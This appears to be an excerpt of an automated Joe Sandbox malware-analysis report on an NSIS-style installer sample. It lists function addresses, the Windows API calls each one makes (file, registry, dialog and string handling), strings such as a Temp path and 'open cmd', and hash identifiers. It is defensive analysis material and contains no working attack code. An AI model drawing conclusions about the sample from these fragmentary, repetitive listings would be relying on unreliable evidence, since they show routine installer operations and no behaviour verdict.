Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: f9228c852270c76ef78ec2ca11ee776aa8e2f0e6cd55c43c8e62e95c72d82e91
Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
Opcode Fuzzy Hash: f9228c852270c76ef78ec2ca11ee776aa8e2f0e6cd55c43c8e62e95c72d82e91
Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405A8E
GetLastError.KERNEL32 ref: 00405AA2
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
GetLastError.KERNEL32 ref: 00405AC1

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A71

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 3449924974-2382934351
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406557: lstrcatW.KERNEL32(open cmd,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(open cmd,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 74636cf2ecc57cf3bcc44e22a8085c4cd552b452b46a4d91cdb067a33bc801f9
Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
Opcode Fuzzy Hash: 74636cf2ecc57cf3bcc44e22a8085c4cd552b452b46a4d91cdb067a33bc801f9
Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D23 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
wsprintfW.USER32 ref: 00404DCD
SetDlgItemTextW.USER32(?,007A1F48), ref: 00404DE0

Strings

%u.%u%s%s, xrefs: 00404DAE

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: b63b375c52d9e39ea065d19b7d609cfd2a106d227f9d41c37452b91305e63ea2
Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
Opcode Fuzzy Hash: b63b375c52d9e39ea065d19b7d609cfd2a106d227f9d41c37452b91305e63ea2
Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405EF1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 00405E94: CharNextW.USER32(?,?,007A4750,?,00405F08,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405EA2
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF

lstrlenW.KERNEL32(007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405F4A
GetFileAttributesW.KERNEL32(007A4750,007A4750,007A4750,007A4750,007A4750,007A4750,00000000,007A4750,007A4750,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C46,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F5A

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405EF1
PGz, xrefs: 00405EF7

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\$PGz
API String ID: 3248276644-2826072134
Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405DEF
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037ED), ref: 00405DF9
lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DE9

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction ID: 88099082ea7d1cc716486b810d419c96650c49a7fc0f2dc261fb7bb284c478c3
Opcode Fuzzy Hash: b52c166fbdc46a50eb389bc731d276b0b3b8dd33dc72d9bc298b94529c150aa9
Instruction Fuzzy Hash: AEF08230502620AFC2216F50FD0898B7F78FB40B52745C47BF145F15A8CB3C09828B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004054F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040551F
CallWindowProcW.USER32(?,?,?,?), ref: 00405570

Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4

Strings

, xrefs: 00405500

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1260196137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260225233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.0000000000793000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260240173.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1260528232.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction ID: 9d4fd90c1d1287ad01f41678c6dcc1ca6f3bae65868fe0495ea0105890a895ad
Opcode Fuzzy Hash: 12bfab27e4c440399339c76943a3ce3238f45f096417f1c9bebb63cc2fec6fed
Instruction Fuzzy Hash: CC01BC71100648BFEF209F11ED80A9B3B27FB84390F548037FA057A2E5C77A8D529A69

Uniqueness

Uniqueness Score: -1.00%

Function 004063E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F28,00000000,?,?,open cmd,?,?,0040664F,80000002), ref: 0040642E
RegCloseKey.ADVAPI32(?,?,0040664F,80000002,Software\Microsoft\Windows\CurrentVersion,open cmd,open cmd,open cmd,00000000,007A0F28), ref: 00406439

Strings

open cmd, xrefs: 004063EF

Memory Dump Source

Source File: 00000000.00000002.1260209781.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

